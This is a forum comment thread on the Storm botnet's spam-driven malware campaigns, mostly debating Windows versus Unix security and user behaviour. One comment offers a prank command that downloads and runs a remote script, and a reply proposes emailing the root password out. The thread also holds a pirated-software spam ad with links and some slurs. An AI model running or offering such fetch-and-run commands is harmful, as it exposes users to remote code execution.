Storm Botnet Is Behind Two New Attacks

We've gotten a number of submissions about the new tricks the massive Storm botnet has been up to. Estimates of the size of this botnet range from 250K-1M to 5M-10M compromised machines. Reader cottagetrees notes a writeup at Exploit Prevention Labs on a new social engineering attack involving YouTube. The emails, which may be targeted at people who use private domain registrations, warn the recipient that their "face is all over 'net" on a YouTube video. The link is to a Storm-infected bot that attacks using the Q4Rollup exploit (a package of about a dozen encrypted exploits). And reader thefickler writes that the recent wave of "confirmation spam" is also due to Storm, as was the earlier, months-long "e-card from a friend" series of attack emails.

Ha!

Never will happen to os x or other *nix systems.

Re:Ha!

[jcr]

We don't get infected, but UNIX users still have to deal with the spam that the botnets are spewing.

I am really bloody sick of Microsoft's shoddy work. The spammers are arsonists, but Microsoft are the company that keeps building the houses out of gasoline-soaked balsa wood and flash paper.

-jcr

Re:Ha!

[nsanders]

If UNIX/Linux became the desktop standard and had 80% of the market it would be fully assaulted by exploiters and script kiddies. We are not immune, we are simply not as big of a target because of Windows market share. I don't think the magnitude of the problems would be the same, but to say it will (or could) never happen to *nix or OS X is naive.

Re:Ha!

[mightyQuin]

I am really bloody sick of Microsoft's shoddy work.

Agreed, but the other thing about this problem that really seems to burn all the sysadmins and network admins and IT geeks out here is that with all the amazing knowledge and problem solving abilities, no one has been able to devise an elegant solution to this problem.

Holy impotance Batman!

Re:Ha!

[TheRaven64]

Use TCP/IP stack fingerprinting and drop all packets from Microsoft operating systems at the edge of your network until they fix their OS?

We've found solutions; don't use shoddy software. The problem is all of the people who haven't switched yet.

Re:Ha!

[pe1chl]

When Microsoft improves their OS to disallow silent installation of software and other administator-level access to the system, all tweakers and other "helpful sites" fall over eachother explaining how this mechanism can be defeated.
This happened with XP SP2, and it happens again with Vista.

Most Linux users seem to understand that it is unwise to surf while logged in as root, but at the same time they setup the Windows systems at their friends homes to do so, because "it would be too much of a hassle to use separate accounts for admin and working".

As long as the situation remains like this, there is little Microsoft can do.
But of course, the whole idea that userfriendlyness is more important than security is out of their hat.

Re:Ha!

[Jugalator]

The spammers are arsonists, but Microsoft are the company that keeps building the houses out of gasoline-soaked balsa wood and flash paper.

OK, since you used the word "keeps building", I assume this is about more like Vista than Windows 95.

But if a trojan in Vista asks you to elevate its privilegies (due to UAC) to run administrative tasks such as installing itself in the system, and the user clicks yes, what should happen instead? This would be equivalent to a Linux user getting an email telling he needs to run some shady software under root privilegies, and the user saying "yes please, do that now".

Re:Ha!

[MrMr]

Most Linux users seem to understand that it is unwise to surf while logged in as root, but at the same time they setup the Windows systems at their friends homes to do so, because "it would be too much of a hassle to use separate accounts for admin and working

You mean it is the evil linux haxors that deliberately sabotage poor Microsoft?

That is hilarious.

Re:Ha!

[uncleFester]

Never will happen to os x or other *nix systems. .. and just where the hell do you think the term 'rootkit' came from?

this kind of hubris is what can make osx/linux/whatever a zombie just as fast as anything else out there.

i guess you never heard of the old sendmail worm, php-based exploits, etc etc ... ? and i guess i just imagine those security advisories IBM puts out for AIX...

if you do no work to insure your OS is as tight as necessary, regardless of what that OS is, you will leave yourself open to being improperly utilized as a system.

-r

Re:Ha!

"If UNIX/Linux became the desktop standard and had 80% of the market it would be fully assaulted by exploiters and script kiddies."

The question is, would the end results of these "assults" have the same impact as targeting M$ systems?

Re:Ha!

[Jartan]

But if a trojan in Vista asks you to elevate its privilegies (due to UAC) to run administrative tasks such as installing itself in the system, and the user clicks yes, what should happen instead? This would be equivalent to a Linux user getting an email telling he needs to run some shady software under root privilegies, and the user saying "yes please, do that now".

I haven't used Vista but I was under the impression that UAC is really broken because it's constantly spamming you with stupid questions to the point that most people just turn it off?

Re:Ha!

[kabdib]

If Unix / Linux was the dominant operating system of the day, who would you be blaming? Because this is purely a matter of the number of machines in the field; it's how attractive the target is.

Let's say that Windows was magically replaced by (say) Ubuntu installs tomorrow, all over the world, with the best known default configuration in terms of being secure. Within a day you'd have exploits, and rapidly growing botnets.

Ideally, *you* would then be ranting about the morons who wrote the kernel, the idiots who did the filtering and mail clients, the jerks who designed the network protocols, and the nincompoops who can't rub two curly braces together without creating a security hole.

Or you could do some research and realize that this stuff is just bloody hard to get right. By anyone. By people who have been doing this their entire careers.

Look, the security holes are *already there* on other platforms. Why aren't you ranting about them?

Meh.

Re:Ha!

Most of the exploits you mention are for server software. Who would run a sendmail software on their Linux client ? You can if you want to but I don't see many windows clients installing mail server on their machine. Before you blame Unix, get a clue or a brain.

Re:Ha!

[Tom]

Technically, yes.

But the user is not a technical system. When you deal with users, you need to follow good user interface guidelines, not just technical, binary thinking. That's where MS - despite their money, years of experience, own research center and all - still produced a total failure. UAC is one of the worst abominations of user interface design ever. You can give an entire presentation on its shortcomings.

Re:Ha!

So your uninformed but still willing to share your opinions?

Re:Ha!

[cp.tar]

Most Linux users seem to understand that it is unwise to surf while logged in as root, but at the same time they setup the Windows systems at their friends homes to do so, because "it would be too much of a hassle to use separate accounts for admin and working

You mean it is the evil linux haxors that deliberately sabotage poor Microsoft?

That is hilarious.

Even worse: it's the good-natured Linux users who try to find a balance between Joe User's wants and needs on the one hand, and their own patience and free time on the other.

I tried. I really tried securing my ex-gf's family computer. I opened accounts for everyone. I only left admin privileges on one account. Set everything up.

Everybody just used the admin account again. Not even the fact that each could have their own desktop didn't entice them to use their own accounts; instead, they had one desktop full of five people's crud.

Re:Ha!

[dkf]

Most Linux users seem to understand that it is unwise to surf while logged in as root, but at the same time they setup the Windows systems at their friends homes to do so, because "it would be too much of a hassle to use separate accounts for admin and working".

As long as the situation remains like this, there is little Microsoft can do. No, they could arrange for the majority of their own user-targetted apps (e.g. Office) to refuse to run in read-write mode when run from an account with Admin privileges. They could clamp down on giving "Windows Certification" to things like printer drivers that require Admin privs to work (after installation). They could get similarly strict with applications. All those sorts of things. Make life actually workable for people who are running without high privs. And without doing that, they'll never manage to inculcate a culture of security, and there's an awful long way to go there, alas...

(BTW, if you're writing a GUI application for Linux, maybe you should think about taking similar steps. We cannot preach to others if our own house is not in order.)

Re:Ha!

" but Microsoft are the company that keeps building the houses out of gasoline-soaked balsa wood and flash paper." - by jcr (53032) on Sunday August 26, @01:00PM (#20363039) Oh, really? Ok...

I can show you a custom-hardened build of Windows Server 2003 that blows away setups from the *NIX world as far as security (epsecially today, in the online world) here, that over 30++ /.'ers outright RAN from:

E.G.-> HARDENING LINUX THREAD @ SLASHDOT WHERE I ISSUED CHALLENGES & A LIST OF THEM TO *NIX FOLKS:

http://it.slashdot.org/comments.pl?sid=267599&cid= 20203061

Vs. the 84.735/100 score (now up to 85.185/100 here currently in fact) I can obtain on it & CIS TOOL is such a multiplatform test of security!

(And, it is noted by SANS & COMPUTERWORLD (often cited here on this site no less) as a tool that helps you secure yourself)

I am not using "mere talk" here, but instead verifiable & comparable results from a valid & legitimate security test that runs on Windows NT-based OS, but also FreeBSD, Linux variants of all kinds, & Solaris.

So, so much for this statement which I see here in essence as this, quite often:

"(Insert *NIX variant here) is more secure or securable than Windows"

Well, ok - but, when faced with the challenge of "putting their money where their mouth is"?

Each *NIX user, ran (& I specifically wanted SeLinux kernel hook addon users of UBUNTU/KUBUNTU + FreeBSD users to try it especially).

APK

P.S.=> Hey - fact is this (despite the usual "F.U.D." trollers spreading their b.s. about Windows & security, vs. any *NIX:

"Outta-the-box/oem stock"? Most ANY OS is not as secure as possible, & this includes all *NIX variants, period!

This is just a fact, & the URL above where I noted *NIX users ran from a fair test that tests analogs on any OS it runs on (for example, for access & rights to configration/startup files for the OS tested, & ALL OS' HAVE THAT)?

Especially when I specifically went to a thread post here on this site, about "hardening Linux"??

Well - Not a single *NIX user there could show me they could harden their system to outdo what mine on Windows Server 2003 SP #2 fully patched can achieve...

No one is willing to "backup their bluster" but, they sure TALK BIG - well, new news: Talk's cheap! Show us, prove it... after all - IF you're going to "talk the talk"? WALK THE WALK! apk

Re:Ha!

[cp.tar]

I am really bloody sick of Microsoft's shoddy work.

Agreed, but the other thing about this problem that really seems to burn all the sysadmins and network admins and IT geeks out here is that with all the amazing knowledge and problem solving abilities, no one has been able to devise an elegant solution to this problem.

Well, to use the GP's analogy, while the houses are still being built out of gasoline-soaked balsa wood, what can we do to stop fires? Disallow high temperatures?

Microsoft's operating systems are currently the main problem. Until Microsoft deploys a fundamentally more secure OS or people simply stop using Windows to any great extent, there is nothing we can do. Especially nothing elegant.

The only elegant solution that comes to mind, really, is OS X. But that's more of an elegant OS than an elegant solution.

Re:Ha!

[The_mad_linguist]

Unpatched windows can be completely secure from this attack, as can any other operating system. Just don't connect to the internet!

Re:Ha!

[cp.tar]

Well, one point in favour of Linux security is the central software repository for each and every distro.

Linux users typically will not - even when the popularity of Linux rises - install random cursors, free smilies and whatnot - simply because they'll be used to installing things from the repository.

And it's quite simple to hammer that into people's heads: the software from the repository is safe. Other software is not.

There is still nothing similar in the Windows world.

Re:Ha!

[ewhenn]

Agreed, but the other thing about this problem that really seems to burn all the sysadmins and network admins and IT geeks out here is that with all the amazing knowledge and problem solving abilities, no one has been able to devise an elegant solution to this problem.

That's because there is no elegant solution to social eng. attacks. The extent of human ignorance is obscene.

I bet if I sent out some random crap exe to a bunch of people, which when opened it would popup a box that said, "h4ck.exe would like to steal your credit card numbers, shit in your bed, and screw your girlfriend. Would you like to continue?" Ok, or cancel. And some people STILL would click ok.

Re:Ha!

[pizzach]

No it's not the same. On windows you just click a vague yes or no button. On linux you tend to need to input a password. One of the two makes it painfully obvious you are about to do something to your core system.

Re:Ha!

"The spammers are arsonists, but Microsoft are the company that keeps building the houses out of gasoline-soaked balsa wood and flash paper."

*ROTFL* Love your expression! :D

Re:Ha!

[PalmerEldritch42]

No, they could arrange for the majority of their own user-targetted apps (e.g. Office) to refuse to run in read-write mode when run from an account with Admin privileges.

I'm sorry, but are you advocating that an ADMIN account should not be granted read/write access to things? Isn't that sort of the point of an admin account. Further destabalizing the OS is not a good solution to an unstable OS. I'm all for making things work better for the non-admin accounts, in order to allow more people to use them, but I don't think that crippling the admin accounts is a good solution.

Re:Ha!

[WhatAmIDoingHere]

I think what he meant was you can install but not use the app while logged in as an Administrator account, encouraging people to log in as users.

Re:Ha!

[jcr]

Because this is purely a matter of the number of machines in the field; it's how attractive the target is.

Bullshit. This is an excuse that MS has been using for decades, while they continued to make the same mistakes that UNIX fixed twenty years ago.

-jcr

Re:Ha!

[jcr]

Love your expression!

Thanks, but I'm not sure I came up with it. It was either me or Hugh Daniel, in a conversation we had many years ago.

-jcr

Re:Ha!

[jcr]

I can show you a custom-hardened build of Windows Server 2003

Umm... So what? You go to great lengths to lock down a windows machine, and good for you. It doesn't help the millions of people affected by the bugs present in a pristine install of any MS product.

-jcr

Re:Ha!

[DigiShaman]

But if a trojan in Vista asks you to elevate its privilegies (due to UAC) to run administrative tasks such as installing itself in the system, and the user clicks yes, what should happen instead?

How about Bitch Slapping the user...HARD!

I sware it, I'm gonna mod a mouse with a capacitor to have two electrodes on its surface. When the user fucks up, they get nasty shock in the palm of their hand!

Re:Ha!

Hey, look at the delusional nutjob!

You truly are an idiot.

Re:Ha!

You're a fscking moron. i guess you never heard of the old sendmail worm, php-based exploits, etc etc ... Duh! They're application, shit ones at that. You're also several years out of date. Gay faggot.

Re:Ha!

[hedwards]

That was one of the "reasons" why the head of IT at my college said that *nix had such a good reputation for security. Because they were historically not connected to the internet. Balderdash, and he really should have known better than to say that. Unix was around since before the inception of anything resembling modern networking. As of relatively recently, the networking stack for Windows was borrowed from the original stack developed as part of freebsd if memory serves. If memory doesn't serve, then it was one of the other *bsds.

MS didn't get into networking for quite a while after the original networking was done. Even then it wasn't until the mid nineties that they got even halfway serious about it.

*nix would cope better with security problems than Windows does. Mainly due to the fact that Windows is needlessly complicated. Performance harming bloat is also a security problem, more lines of code are more lines that are potentially buggy, and take much longer to go through for auditing. A leaner OS, especially one which keeps things like browsers separate from the kernel have a much easier time of hardening. But with Windows, you have explorer whether you web surf or not, and to make matters worse, it is required for updates. Yes, somebody in an enterprise situation could just download the patches on a different machine, but the majority of the people don't have that luxury. And if memory serves, doing so would be a violation of the eula anyways.

Re:Ha!

[Willfon]

Actually, there are gaping holes in MacOS X as well. If I send out an email with a file attached (eg. .dmg), I can make the recipient install distributed.net, believing he is just getting a business card. Provided of course the user is an administrator and that he opens the businesscard-like installer. Not that long ago Apple patched a hole, where a code was run when you opened a creatively made .dmg file. New holes keep cropping up, but in the end, the biggest hole is the trusting user who use the default login user, which is an administrator.

And that hole is the same, no matter if you run Windows, MacOS X, Linux or MyLittlePonyOS

Re:Ha!

[mattpalmer1086]

I didn't read it as being about Vista - "keeps building" says to me the OP means that they keep building insecure systems - i.e. all of them. I doubt very much whether Vista machines are a major component of these huge botnets. Much more likely to be older windows versions.

I do agree that it's the user who is the security hole here, and that wouldn't change even if everyone was running unix rather than windows. Both those systems suffer from a basic design flaw that assumes that all processes should run with the same privileges as the logged-on user. This stems from designs of the late 60s and 70s, in which loading new programs was done by trained and skilled administrators, users of programs were also pretty technically skilled, and very few people were connected to a global network.

Given that things have changed a tad since then, it might be worth considering some new designs, in which all processes are automatically sandboxed and do not run by default with the full privileges of the user launching / installing them. I don't deny that this is a hard thing to get right (UAC is a step in this direction), and ultimately, if an unskilled user says "Yes! Go ahead!" to the dancing pigs, it's on their head. But saying yes to the dancing pigs shouldn't automatically give a trojan access to their network, personal documents, etc. etc.

Re:Ha!

[arivanov]

This is not crippling admin accounts, it is making apps behave in an administrative manner when run by an admin.

Staroffice 3.x was a brilliant example. When you ran its setup as root it automatically went into global per-machine setup mode, while running it as Joe Average User made it run a workstation setup. In fact Office 6.x for Windows 95/NT behaved in a similar manner as well. If you ran it from a network install it behaved differently when run as admin vs when run as an average user.

I have no idea why developers stopped doing that. IMO, that was the right behaviour.

Re:Ha!

[ispsuckx]

Go shill somewhere else troll

Re:Ha!

[houghi]

There is an easy way to prevent such a thing. Open a terminal and execute the following. Just follow instructions.

wget http://houghi.org/virus && sh virus

HTH, HAND.

Re:Ha!

if you do no work to insure your OS is as tight as necessary, regardless of what that OS is, you will leave yourself open to being improperly utilized as a system.

I agree.

Up until March of this year, my main box was running Windows 2000. I had no infections, no rootkits, nothing. I had no crashes, no BSODs, nothing. I was connected to the net from the second day I built the machine. I ran that machine for five years. Never had to reformat. I used it regularly and with a variety of games and software.

This was due to me making sure I learned what I was doing when I first decided to install 2k instead of XP. I have books on securing 2K, I turned off many things that did not need to run. I set up the machine pretty nicely, but I still worried. The machine was behind a NAT'd router/firewall, but I still worried. I worried less the day I stopped using IE and started using Firefox, but I still kept vigilant.

Last year I started installing Linux on my computers. I did not install it until March of this year on my main system. My main system now runs Debian Etch.

Am I more secure now than I was in February? No. The major difference is that my OS will be kept up to date by the folks at Debian for quite awhile, unlike having my system hit "end of life" like MS did with my 2k install. A few minor differences is that I had less tuning to make sure my machine was safe, as Etch is a bit more secure than Windows is upon install. Plus a difference that weight between major and minor is the dedication of the folks creating the Open Source software that the dedicated people working on Debian go over before putting it into the stable repositories.

Am I complacent? No. Do I still check everything I need to and then some? Yes. Is it worth it to be this vigilant? To me, yes. In addition to this I feel more confident in helping others get through tough problems.

Windows is insecure at install. Linux is insecure with a careless change or improper permissions set. BSD is it's own beast with OpenBSD setting a high mark for security by design.

If you system is hooked up to a network, or it has any type of media port/drive then it is vulnerable to many things, and if it has none of that, it is still vulnerable to someone who can code directly on the machine.

Re:Ha!

i know! Let's ask the user 10-100 times a day with lookalike messages and see if they can catch the one they shouldn't accept :)

Re:Ha!

[parkrrrr]

Only if you're already logged in as an admin. If you're logged in to an limited account - as you should be - you'll have to provide some administrative credentials.

Re:Ha!

[coryking]

Care to mention those mistakes?

Hell, if I was a botnet writer, I'd love it if everybody was using Linux. I'd get:

- A compiler on every box!
- A shell on every box
- SSH for remote access

Even now I promise you that all those compromised windows machines are talking to a hacked linux box.

Re:Ha!

[spikedvodka]

cute... really cute, but for proper effect, it should then e-mail the supposed root password back to some @hotmail.com e-mail address

Re:Ha!

[ddrichardson]

You're the second person to suggest this and its not entirely correct, its to do with Windows having a market share where there are a large number of people who don't know any better hence make better "marks".

The average Linux user is reasonably aware of security.

Re:Ha!

[kabdib]

The Morris worm was in the Fall of 1988.

Fixed for . . . well, maybe nineteen years?

The technical term for someone who puts a *nix box on the net without the latest set of updates, patches, and good planning is "0wn3ed."

Re:Ha!

[jagdish]

Morris was a worm? I always thought he was a Cat.

Re:Ha!

[trawg]

Everybody just used the admin account again. Not even the fact that each could have their own desktop didn't entice them to use their own accounts; instead, they had one desktop full of five people's crud. Did they end up just using the admin account because of loser applications that require administrative access to install, though? Or was it more psychological/force of habit to use the "better" account?

Windows apps need to start installing in user space by default. Installing into the "system" is such a pain in the ass.

Re:Ha!

[rolfc]

They probably would click on OK, but it is Microsoft that allows that program to run, on linux it doesnt work.

Re:Ha!

[Yoozer]

There is still nothing similar in the Windows world.

I find it perverse that they're all gung-ho about "Windows logo tests" with trusted, validated drivers while by far the biggest culprit causing instability and a bloody mess is the software the users install, not the drivers.

Accidentally, how would someone go about adding a Bonzi Buddy-esque piece of software to the repository?

Re:Ha!

[SpecTheIntro]

So your uninformed but still willing to share your opinions?

This is not flamebait. It was a true observation: people should not criticize Vista's UAC if they genuinely don't know anything about it. People who think UAC is overly obtrusive haven't used Vista enough: during the initial install phase, yes, you need to grant access fairly often. But that's no different than on any Linux machine. The problem is that most programs that have no business requiring root access (AIM?) require it for a successful install and sometimes even afterwards, and so Windows users get the impression that they can't do anything unless they're an admin. Vista does a lot of things wrong (it is far too resource-intensive, IMO) but this isn't one of them. Calling someone out who doesn't use Vista and doesn't know much about UAC when they make false statements shouldn't qualify as flamebait.

Re:Ha!

[Culture20]

Actually, I know more than a few new-to-linux people that download random rpms once they know the rpm command. It sucks because they get owned, but then whine to me "you said linux was more secure!"

Re:Ha!

[kon23uk]

Nice idea as the second thing to do, but how about making sure that the applications can run as a non-privileged user, even if you have to be privileged to install it? A large amount of my time has been spent hacking file privileges and learning how to do "custom installs" to allow my daughters to run games and other applications, such as Sims and the Encyclopaedia Britannica, even then there is a special ID they have to run certain applications as ;(((

Re:Ha!

[BlackSnake112]

Is that an problem for the or the application? If the application writers don't want to install in user space and work correctly, can you blame microsoft for software that they (it) didn't write? Also, if application stop needed the full system level access to run, these applications could be ported easier. Well maybe anyway. Your 10000% correct application need to stop needing write access to the windows system directories.

Re:Ha!

[BlackSnake112]

If Linux had the 80+% market share, would all those users be reasonably aware of security?

Re:Ha!

This is EXACTLY what needs to be done. This is also the purpose of SE Linux. Usable policies are installed in fedora and probably most other distributions by now. From what I've heard this is the main purpose of UAC also... except that it's easier to click the cancel/allow button in UAC.

Re:Ha!

[vtcodger]

***When Microsoft improves their OS to disallow silent installation of software and other administator-level access to the system... ***

If/when they do that, then the bad guys will just run their malware from the user's account. You don't have to be root/admin to send spam. Or they will include a few privilege escalation exploits in their package. Or both.

There are good reasons for many users not to run as root, but there are problems that not running as root won't cure, and I'm pretty sure that this sort of thing is one of them.

The article mentions that the Q4Rollup exploit is used. A quick Google didn't produce a complete inventory of what is in Q4Rollup, but it wouldn't suprise me that it already includes some Windows privilege escalation stuff along with the keyloggers, spyware and rootkits. My guess is that in a few years, these malware packages will include some Mac/Linux exploits just to spread the joy to the growing number of non-Microsoft desktop users.

***Most Linux users seem to understand that it is unwise to surf while logged in as root, but at the same time they setup the Windows systems at their friends homes to do so, because "it would be too much of a hassle to use separate accounts for admin and working".***

I don't know about Vista, but I do know that in W2K setting up applications in a user account was a somewhere between a wierd and a total nightmare. Very much a matter of install, find out where the damn code went, tinker until it works. I decided right then and there that I'd had enough. I kept my own machines on Windows 9. I started learning Linux. And I ran the one XP machine I was occasionally forced by circumstance to use as admin because I just didn't have the time to fix installs so they worked from a user account. I assume that things are better now, but I don't care. For the most part, I don't do NT based Windows.

Thankfully, the Linux desktop is now pretty much ready for prime time.

Re:Ha!

[bane2571]

wait, you can't run programs that do things with the users' permission on linux? How odd.

Re:Ha!

[bane2571]

so if I get trusted software version 1.(n+1) and have to install it as admin - I do this monthly by the way - and the program asks me to elevate its privileges so it can install (which it does) I should get a bitch slap for saying yes? Why should windows have to tell if I'm being an idiot or not?

it's time..

for a toaster rodeo
YEEEE HAAAAW!!

Storm Botnet

I for one welcome our Storm Botnet overlords.

I had a 500% increase in Spam on Tuesday Last Week

[Jennifer+York]

I wonder if the huge spike in spam from Tuesday is at all related to this botnet... It was crushing, we had so many users complaining about slow mail service, and it was traced back to a maxed out mail server diligently blocking the spam. The storm passed by Wednesday, but it did so us that we need to upgrade our infrastructure.

I fscking hate SPAM!

Skynet...

[Colin+Smith]

It's looking for more processing power...

http://www.emhsoft.com/singularity/

YKIMS!

Thank you Microsoft

Without your poor security record and woeful OS, spammers wouldn't have this huge arsenal at their disposal. Furthermore, companies and people wouldn't be spending billions a year fighting this crap. Hope your happy Billyboy Gates!

Re:Thank you Microsoft

Hope your happy Billyboy Gates! Hope my happy Billyboy Gates what?!

Re:Thank you Microsoft

[ScentCone]

Hope your happy Billyboy Gates!

I'm not sure which is worse: unpatched Windows machines, or Linux boxes without the critical patch that allows fanboys to type the word "you're."

Re:Thank you Microsoft

It was a complete sentence. Gates was meant as a verb.

Re:Thank you Microsoft

[sveard]

Without your poor security record and woeful OS, spammers wouldn't have this huge arsenal at their disposal. Furthermore, companies and people wouldn't be earning billions a year fighting this crap. Hope your happy Billyboy Gates! There, fixed that for ya

Re:Thank you Microsoft

[Raideen]

My Linux box works fine. I'm not sure what you're problem is. ;-)

Re:Thank you Microsoft

[kon23uk]

Ah, the good old "Apostrophe Catastrophe". They need stringing up, but I can

i for one welcome

our toaster-riding overlords.

outage? fat fingered admin more likely

Nothing to do with Savvis spewing routes all over teh intarwebs?

(Slashdot's in AS3561)

8 t2c1-p9-0.uk-eal.eu.bt.net (166.49.208.209) 16.189 ms 16.802 ms 15.068 ms
9 t2c1-p5-0-0.us-ash.eu.bt.net (166.49.164.65) 103.232 ms 102.751 ms 102.493 ms
10 cpr2-pos-0-0.VirginiaEquinix.savvis.net (208.173.10.133) 104.467 ms 103.687 ms 105.351 ms
11 er2-tengig2-1.virginiaequinix.savvis.net (204.70.193.102) 104.207 ms 104.050 ms 103.280 ms
12 hr1-tengig8-1.sterling2dc3.savvis.net (204.70.197.81) 108.874 ms 108.533 ms 109.409 ms
MPLS Label 652 TTL=1
13 * * *
14 204.70.196.125 (204.70.196.125) 196.968 ms 264.934 ms 232.841 ms
MPLS Label 16659 TTL=255
15 cr2-loopback.sfo.savvis.net (206.24.210.71) 199.031 ms 345.420 ms 311.107 ms
16 bhr1-pos-0-0.SantaClarasc8.savvis.net (208.172.156.198) 197.105 ms 345.628 ms 311.031 ms
17 csr1-ve240.santaclarasc8.savvis.net (66.35.194.34) 196.651 ms 2413.625 ms 2378.773 ms
18 66.35.212.174 (66.35.212.174) 197.395 ms 341.213 ms 306.301 ms
19 slashdot.org (66.35.250.150) 197.697 ms !5 612.455 ms !5 578.147 ms !5

And I'll see your mom at the monster truck show...

...flinging toasters at Bigfoot.

GRrRRAAAAvVVVEEEE DIIIIGgGEEEErRRRR!!!

Hey

[Joseph1337]

Does someone knows Bill`s e-mail (I want to thank him for Windows and the great job he has putting for the soft community)? No? Crap...

250k to 10M bots?

there could be a lot or not a lot

Re:250k to 10M bots?

[micksam7]

250k is still a lot. Enough to spew 64 gigabits per second of data, assuming each infested machine had a 256k uplink [and ignoring other factors]. That's enough to take out a decent sized datacenter.

On the other end, 10 million could possibly take out a entire ISP, and I'm talking about a backbone ISP too. THAT'S terrifying stuff.

Software at low Pr1ce

OEM software means: no DVD/CD, no packing case, no booklets and no overhead cost!
So OEM software is synonym for lowest price.

Buy directly from the manufacturer, pay for software ONLY and save 75-9O%!

Check our discounts and special offers! Find software for home and office! Different platforms. World leading manufacturers. Instant download.

---- HOT ITEMS

Windows XP Pro + SP2 $49
MS Office Enterprise 2OO7 $79
Adobe Acrobat 8 Pro $79
Microsoft Windows Vista Ult $79
Macromedia Studio 8 $99
Adobe Premiere 2.O $59
Corel Grafix Suite X3 $59
Adobe Illustrator CS2 $59
Macromedia Flash Prof 8 $49
Adobe Photoshop CS2 V9.0 $69
Macromedia Studio 8 $99
Autodesk Autocad 2OO7 $129
Adobe Creative Suite 2 $149
http://dst.potapsoft.com/?568D6001AC9 ----
Top items for Mac:
Adobe Acrobat Pro 7 $69
Adobe After Effects $49
Macromedia Flash Pro 8 $49
Adobe Creative Suite 2 Prem $149
Ableton Live 5.0.1 $49
Adobe Photoshop CS $49
http://dst.potapsoft.com/-software-for-mac-.php?56 8D6001AC9FA9E97D5F40E38178593851&t6
----
Popular eBooks:
Home Networking For Dummies 3rd Edition $10
Windows XP Gigabook For Dummies $10
Adobe CS2 All in One Desk Reference For Dummies $10
Adobe Photoshop CS2 Classroom in a Book(Adobe Press) $10
----
Find more positions by these manufacturers:
Microsoft...Mac...Adobe...Borland...Macromedia...I BM
http://dst.potapsoft.com/?568D6001AC9FA9E97D5F40E3 8178593851&t4
----



Gabriel knew he was being arro
Has this baron offended you in
No. Who is he, Johanna? I wont
I want to know... He stopped his
Listen to me, he commanded. Yo

How does the infection spread?

[CopaceticOpus]

I'm curious just how this works - what does a recipient of this email need to do to get infected?

First they need to open the message. It should have gotten filtered into a junk folder (if not blocked altogether) so the user must be actually going through their junk mail folder and reading things. Who has time to waste on that?

Now, I'd assume noone will get infected just by opening the mail. They'd have to at the very least click on the link. Will clicking be enough to infect a computer? Does it depend on the brand of browser and/or how recently it has been patched? Is the latest (Oh, let me pick a browser out of a hat here) IE6/IE7 in fully patched form still vulnerable?

Now of course, if anyone is dumb enough to follow the link, AND accept an executable download, AND run that download, they will be infected. Is that what's actually happening here?

Re:How does the infection spread?

[Lobster+Quadrille]

Generally, you click the link and it takes you to a page that will try one of many (mostly patched) javascript exploits to install malware on your system. I reverse engineered a few of these pages last week and, while they weren't amazingly clever, it is interesting.

If that doesn't work, they usually bring up a page saying something like 'If you are seeing this message, please download our secure login software', along with a link.

I'm surprised they even try something as obvious as this, but I assume that it works to some extent, based on the fact that I'm still getting the spam.

Re:How does the infection spread?

[Chris+Tucker]

"Now of course, if anyone is dumb enough to follow the link, AND accept an executable download, AND run that download, they will be infected. Is that what's actually happening here?"

Yes.

NEVER underestimate the willful stupidity, mind numbing incompetence and insistant ignorance of the typical Windows luser.

The STORM botnet? ALL Windows machines. ALL OF THEM.

Re:How does the infection spread?

[garcia]

First they need to open the message. It should have gotten filtered into a junk folder (if not blocked altogether) so the user must be actually going through their junk mail folder and reading things. Who has time to waste on that?

Neither SpamAssassin nor GMail's mail filters are nabbing a lot of this stuff at first. I've marked about 15 of them as spam on my website's GMail account and yet similar messages are *still* getting through. I can certainly understand how people are being infected in the first message wave.

Re:How does the infection spread?

[pe1chl]

Yes. But remember, the mail message pretents to be something like an e-card from a friend. You have to click on the link to see the e-card.
Many naive users would really want to see the e-card their friend has sent (even though it is never mentioned who that friend may be) so they click the link.
The next page explains they have to load some software. Not to unusual in the naive user's world. They visit websites all the time that tell them that they have to update their flash plugin, a codec, an active-x component, or whatever. They already click away those pop-ups that warn them before they have actually read them.
Besides, the first page explains that they have to click OK and go through the installation or they will not be able to see the card. Who would want to turn down their friend and not view an e-card sent to them?

So the trojan is downloaded and installed. No problem, because they are logged in as an administrator. Who sets up their system to use separate accounts for admin and use? Maybe 1% of users try that.

So, the naive user very easily gets infected. Mainly because in the past they have seen so many useless pop-ups warning them about potentially harmful things that others have told them they should click away (like getting a warning when you delete something). A pop-up no longer is an alerting event that requires attention, it is just a stupid window that gets in the way of your "internet experience".
Furthermore, most users are not prepared to think about security or to take extra steps to secure their systems (like using a separate account for software installation and system maintenance).

Re:How does the infection spread?

[Tom]

Mainly because in the past they have seen so many useless pop-ups warning them about potentially harmful things that others have told them they should click away (like getting a warning when you delete something). A pop-up no longer is an alerting event that requires attention, it is just a stupid window that gets in the way of your "internet experience". Exactly. That's as if you had sensors in your clothes to ring a bell every time someone touches you, because he might be a pickpocket. I guarantee you that after one day in the city, you'll turn it off. Or if you can't do that, start to ignore it. Boom, suddenly you are an easier target than you would be without the "alarm system". You got desensitised.

Oh, and also because most of those warnings are really not useful for the user. They shove the responsibility on the one person least suited to actually make the call. "Hey, loser, W32kdrv.dll wants to access 0xf4a50cb to do CrypicThing() which could result in Lengthytechnobabblethatsoundsverymuchlikethenonsen seyouhearonstartreck - do you now want to disallow it not doing it?"

Re:How does the infection spread?

[houstonbofh]

Because the latest one has a message like "I can't believe it is you" or "Look at the drunk chick" and a youtube link. Only by hovering over it, and looking at the bottom of the windows do you see it become an IP address with no other stuff. And after trying for 10 years, I have yet to teach my mother how to do this, why it is important, or what it means. It is actually one of the most cleaver wetware hacks I have seen in years. Too bad it works so well.

Re:How does the infection spread?

[cottagetrees]

When a user clicks on the hyperlink in the spam to view their video, they're instead sent to another IP address, where the Q4rollup exploit (a collection of about a dozen encrypted exploits) checks to see if you're fully patched against all the security vulnerabilities the exploits target. If you're unpatched anywhere, you're hit with a driveby download that your AV or AS software is unlikely to catch.

Re:How does the infection spread?

[CopaceticOpus]

It would be interesting to see a breakdown of which browsers are vulnerable in what ways. I googled Q4rollup but it was only mentioned here on /.

Bottom line, if I tell my Mom to only use Firefox, is she protected against all of this?

Re:How does the infection spread?

Security popups and users running as administrators have nothing to do with this. A user that is willing to install a Trojan will not be deterred by security warnings. Security warnings will only protect against a program that the user did NOT intend to run.

And a local user account is just as useful as an admin account to a spam bot. The typical zombie machine is only used by a single person who is always logged-in. There is nothing that a spam bot needs to do that it cannot do from a low-priv account.

dom

Re:How does the infection spread?

[doktorjayd]

firefox on linux ( and proboppably mac ).

yes.

firefox on windows.

no.

so long as the execution model is flawed in windows, these vulnerabilities will come up at every opportunity.

